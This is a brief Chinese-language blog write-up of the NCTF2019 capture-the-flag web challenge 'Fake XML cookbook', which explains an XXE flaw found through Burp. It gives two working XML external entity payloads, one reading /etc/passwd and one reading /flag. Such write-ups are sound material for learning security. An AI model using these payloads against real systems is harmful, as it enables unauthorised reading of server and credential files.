[NCTF2019]Fake XML cookbook

CTF

根据题目名字知道是XXE漏洞，直接burp抓包看一下，发现有XML实体

尝试读取下文件

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "file:///etc/passwd">
  ]>
<user><username>&admin;</username><password>admin</password></user>

一般flag都在根目录下，修改下payload读取flag

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY admin SYSTEM "file:///flag">
  ]>
<user><username>&admin;</username><password>admin</password></user>

如果觉得文章对你有用，请随意赞赏

ctf web writeup

[NCTF2019]Fake XML cookbook

https://www.bnessy.com/archives/nctf2019fakexmlcookbook

作者

Bnessy

发布于

2022-03-25

更新于

2022-03-25

许可协议

CC BY 4.0